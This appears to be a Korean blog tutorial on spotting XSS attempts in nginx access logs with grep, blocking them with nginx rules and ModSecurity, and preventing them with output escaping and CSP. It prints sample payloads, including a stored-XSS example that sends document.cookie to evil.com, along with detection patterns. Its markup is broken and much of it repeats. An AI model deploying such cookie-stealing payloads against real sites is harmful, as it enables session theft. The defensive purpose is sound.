작성일: 2026-05-25 XSS보안WAF

웹 로그에서 XSS(Cross-Site Scripting) 공격 탐지하기

XSS(Cross-Site Scripting)는 악의적인 스크립트를 웹 페이지에 삽입하여 다른 사용자의 브라우저에서 실행시키는 공격입니다. SQL Injection과 함께 OWASP Top 10의 단골 취약점이며, 웹 서버 로그에서 공격 시도를 조기에 탐지할 수 있습니다.

XSS 공격이 로그에 남기는 흔적

공격자는 URL 파라미터, 검색어, 댓글 입력란 등에 HTML/JavaScript 코드를 삽입합니다.

반사형 XSS (Reflected XSS)

URL에 직접 스크립트를 포함:

`` GET /search?q= GET /page?name= GET /user?id="> `


URL 인코딩된 XSS

` GET /search?q=%3Cscript%3Ealert%281%29%3C%2Fscript%3E GET /page?url=javascript:alert(document.domain) GET /redirect?url=%2F%2Fevil.com%2Fxss.js `

%3C = <, %3E = >, %2F = /



주요 XSS 탐지 패턴
패턴 설명
------ ------
스크립트 태그 삽입
이미지 로드 실패 이벤트 악용
</td><td>외부 프레임 삽입</td></tr>
<tr><td></code>javascript:<code></td><td>JavaScript 프로토콜 악용</td></tr>
<tr><td></code>onerror=<code>, </code>onload=<code>, </code>onclick=<code></td><td>이벤트 핸들러 삽입</td></tr>
<tr><td></code>eval(<code>, </code>document.cookie<code></td><td>악의적 JavaScript 함수</td></tr>
<tr><td></code><svg onload=<code></td><td>SVG 태그 이벤트 악용</td></tr>
<tr><td></code><body onload=<code></td><td>body 태그 이벤트</td></tr>
<hr>
<h2>grep으로 XSS 시도 탐지</h2>
<h3>기본 스크립트 태그</h3>
<p></code>`<code>bash grep -iE "(<script|</script|<iframe|javascript:)" /var/log/nginx/access.log </code>`<code></p>
<h3>이벤트 핸들러</h3>
<p></code>`<code>bash grep -iE "(onerror=|onload=|onclick=|onmouseover=)" /var/log/nginx/access.log </code>`<code></p>
<h3>URL 인코딩 포함</h3>
<p></code>`<code>bash grep -iE "(%3Cscript|%3C%2Fscript|%3Ciframe|javascript%3A)" /var/log/nginx/access.log </code>`<code></p>
<h3>XSS 시도한 IP 집계</h3>
<p></code>`<code>bash grep -iE "(<script|onerror=|javascript:)" /var/log/nginx/access.log \   | awk '{print $1}' | sort | uniq -c | sort -rn | head -20 </code>`<code></p>
<hr>
<h2>XSS 공격의 종류</h2>
<h3>1. Reflected XSS (반사형)</h3>
<p>악의적인 스크립트가 URL에 포함되어 즉시 반사되는 형태입니다.</p>
<p></code>`<code> https://example.com/search?q=<script>alert(1)</script> </code>`<code></p>
<p>로그에 그대로 기록:</p>
<p></code>`<code> GET /search?q=<script>alert(1)</script> HTTP/1.1 </code>`<code></p>
<h3>2. Stored XSS (저장형)</h3>
<p>DB에 저장된 악의적 스크립트가 다른 사용자에게 전파됩니다. 로그에는 POST 요청으로 기록:</p>
<p></code>`<code> POST /comment HTTP/1.1 Content-Length: 82</p>
<p>content=<script>fetch('http://evil.com?c='+document.cookie)</script> </code>`<code></p>
<p>로그에는 바디 내용이 안 보이지만, POST 경로와 상태 코드로 추적:</p>
<p></code>`<code> 192.0.2.100 - - [10/Oct/2024:14:00:00 +0000] "POST /comment HTTP/1.1" 200 421 </code>`<code></p>
<h3>3. DOM-based XSS</h3>
<p>JavaScript가 클라이언트 측에서 DOM을 조작하면서 발생. 서버 로그에 흔적이 거의 없습니다.</p>
<hr>
<h2>Nginx에서 XSS 차단</h2>
<h3>기본 패턴 차단</h3>
<p></code>`<code>nginx location / {     if ($args ~* "(<script|<iframe|javascript:|onerror=|onload=)") {         return 403;     } } </code>`<code></p>
<h3>ModSecurity WAF 적용</h3>
<p>OWASP Core Rule Set(CRS)는 수백 개의 XSS 패턴을 포함합니다.</p>
<p></code>`<code>bash sudo apt install libnginx-mod-security </code>`<code></p>
<p></code>/etc/nginx/modsec/main.conf<code>:</p>
<p></code>`<code> Include /etc/nginx/modsec/crs/crs-setup.conf Include /etc/nginx/modsec/crs/rules/*.conf </code>`<code></p>
<p>ModSecurity가 활성화되면 XSS 시도는 로그에 </code>[id "941...]<code> 같은 룰 ID와 함께 기록됩니다.</p>
<hr>
<h2>애플리케이션 레벨 대응</h2>
<p>로그 모니터링만으로는 부족합니다. 근본적인 방어는 코드 레벨에서 이루어져야 합니다.</p>
<h3>HTML 이스케이프</h3>
<p><strong>취약한 코드 (PHP):</strong></p>
<p></code>`<code>php echo "검색 결과: " . $_GET['q']; </code>`<code></p>
<p><strong>안전한 코드:</strong></p>
<p></code>`<code>php echo "검색 결과: " . htmlspecialchars($_GET['q'], ENT_QUOTES, 'UTF-8'); </code>`<code></p>
<h3>Content Security Policy (CSP)</h3>
<p>HTTP 헤더로 브라우저가 실행할 수 있는 스크립트를 제한합니다.</p>
<p></code>`<code>nginx add_header Content-Security-Policy "default-src 'self'; script-src 'self' https://trusted.cdn.com; object-src 'none';" always; </code>`<code></p>
<hr>
<h2>MITRE ATT&CK 매핑</h2>
<p><tr><td>공격 유형</td><td>MITRE 기법</td><td>설명</td></tr> <tr><td>-----------</td><td>-----------</td><td>------</td></tr> <tr><td>XSS (일반)</td><td>T1189</td><td>Drive-by Compromise</td></tr> <tr><td>Cookie 탈취</td><td>T1539</td><td>Steal Web Session Cookie</td></tr> <tr><td>크리덴셜 피싱</td><td>T1566</td><td>Phishing</td></tr></tbody></table> <hr></p>
<h2>정리</h2>
<p>XSS 공격은 로그에 </code><script><code>, </code>onerror=<code>, </code>javascript:` 같은 명확한 키워드를 남깁니다. grep으로 이런 패턴을 주기적으로 모니터링하고, ModSecurity 같은 WAF를 적용하면 대부분의 자동화 XSS 공격을 차단할 수 있습니다. 하지만 근본적인 해결은 <strong>모든 사용자 입력을 HTML 이스케이프</strong> 하는 것입니다.</p>
        </div>
      </div>
    </div>
    </div>
  </body>
</html>

패턴	설명
------	------
	스크립트 태그 삽입
	이미지 로드 실패 이벤트 악용
</td><td>외부 프레임 삽입</td></tr> <tr><td></code>javascript:<code></td><td>JavaScript 프로토콜 악용</td></tr> <tr><td></code>onerror=<code>, </code>onload=<code>, </code>onclick=<code></td><td>이벤트 핸들러 삽입</td></tr> <tr><td></code>eval(<code>, </code>document.cookie<code></td><td>악의적 JavaScript 함수</td></tr> <tr><td></code><svg onload=<code></td><td>SVG 태그 이벤트 악용</td></tr> <tr><td></code><body onload=<code></td><td>body 태그 이벤트</td></tr> <hr> <h2>grep으로 XSS 시도 탐지</h2> <h3>기본 스크립트 태그</h3> <p></code>`<code>bash grep -iE "(<script\|</script\|<iframe\|javascript:)" /var/log/nginx/access.log </code>`<code></p> <h3>이벤트 핸들러</h3> <p></code>`<code>bash grep -iE "(onerror=\|onload=\|onclick=\|onmouseover=)" /var/log/nginx/access.log </code>`<code></p> <h3>URL 인코딩 포함</h3> <p></code>`<code>bash grep -iE "(%3Cscript\|%3C%2Fscript\|%3Ciframe\|javascript%3A)" /var/log/nginx/access.log </code>`<code></p> <h3>XSS 시도한 IP 집계</h3> <p></code>`<code>bash grep -iE "(<script\|onerror=\|javascript:)" /var/log/nginx/access.log \ \| awk '{print $1}' \| sort \| uniq -c \| sort -rn \| head -20 </code>`<code></p> <hr> <h2>XSS 공격의 종류</h2> <h3>1. Reflected XSS (반사형)</h3> <p>악의적인 스크립트가 URL에 포함되어 즉시 반사되는 형태입니다.</p> <p></code>`<code> https://example.com/search?q=<script>alert(1)</script> </code>`<code></p> <p>로그에 그대로 기록:</p> <p></code>`<code> GET /search?q=<script>alert(1)</script> HTTP/1.1 </code>`<code></p> <h3>2. Stored XSS (저장형)</h3> <p>DB에 저장된 악의적 스크립트가 다른 사용자에게 전파됩니다. 로그에는 POST 요청으로 기록:</p> <p></code>`<code> POST /comment HTTP/1.1 Content-Length: 82</p> <p>content=<script>fetch('http://evil.com?c='+document.cookie)</script> </code>`<code></p> <p>로그에는 바디 내용이 안 보이지만, POST 경로와 상태 코드로 추적:</p> <p></code>`<code> 192.0.2.100 - - [10/Oct/2024:14:00:00 +0000] "POST /comment HTTP/1.1" 200 421 </code>`<code></p> <h3>3. DOM-based XSS</h3> <p>JavaScript가 클라이언트 측에서 DOM을 조작하면서 발생. 서버 로그에 흔적이 거의 없습니다.</p> <hr> <h2>Nginx에서 XSS 차단</h2> <h3>기본 패턴 차단</h3> <p></code>`<code>nginx location / { if ($args ~* "(<script\|<iframe\|javascript:\|onerror=\|onload=)") { return 403; } } </code>`<code></p> <h3>ModSecurity WAF 적용</h3> <p>OWASP Core Rule Set(CRS)는 수백 개의 XSS 패턴을 포함합니다.</p> <p></code>`<code>bash sudo apt install libnginx-mod-security </code>`<code></p> <p></code>/etc/nginx/modsec/main.conf<code>:</p> <p></code>`<code> Include /etc/nginx/modsec/crs/crs-setup.conf Include /etc/nginx/modsec/crs/rules/*.conf </code>`<code></p> <p>ModSecurity가 활성화되면 XSS 시도는 로그에 </code>[id "941...]<code> 같은 룰 ID와 함께 기록됩니다.</p> <hr> <h2>애플리케이션 레벨 대응</h2> <p>로그 모니터링만으로는 부족합니다. 근본적인 방어는 코드 레벨에서 이루어져야 합니다.</p> <h3>HTML 이스케이프</h3> <p><strong>취약한 코드 (PHP):</strong></p> <p></code>`<code>php echo "검색 결과: " . $_GET['q']; </code>`<code></p> <p><strong>안전한 코드:</strong></p> <p></code>`<code>php echo "검색 결과: " . htmlspecialchars($_GET['q'], ENT_QUOTES, 'UTF-8'); </code>`<code></p> <h3>Content Security Policy (CSP)</h3> <p>HTTP 헤더로 브라우저가 실행할 수 있는 스크립트를 제한합니다.</p> <p></code>`<code>nginx add_header Content-Security-Policy "default-src 'self'; script-src 'self' https://trusted.cdn.com; object-src 'none';" always; </code>`<code></p> <hr> <h2>MITRE ATT&CK 매핑</h2> <p><tr><td>공격 유형</td><td>MITRE 기법</td><td>설명</td></tr> <tr><td>-----------</td><td>-----------</td><td>------</td></tr> <tr><td>XSS (일반)</td><td>T1189</td><td>Drive-by Compromise</td></tr> <tr><td>Cookie 탈취</td><td>T1539</td><td>Steal Web Session Cookie</td></tr> <tr><td>크리덴셜 피싱</td><td>T1566</td><td>Phishing</td></tr></tbody></table> <hr></p> <h2>정리</h2> <p>XSS 공격은 로그에 </code><script><code>, </code>onerror=<code>, </code>javascript:` 같은 명확한 키워드를 남깁니다. grep으로 이런 패턴을 주기적으로 모니터링하고, ModSecurity 같은 WAF를 적용하면 대부분의 자동화 XSS 공격을 차단할 수 있습니다. 하지만 근본적인 해결은 <strong>모든 사용자 입력을 HTML 이스케이프</strong> 하는 것입니다.</p> </div> </div> </div> </div> </body> </html>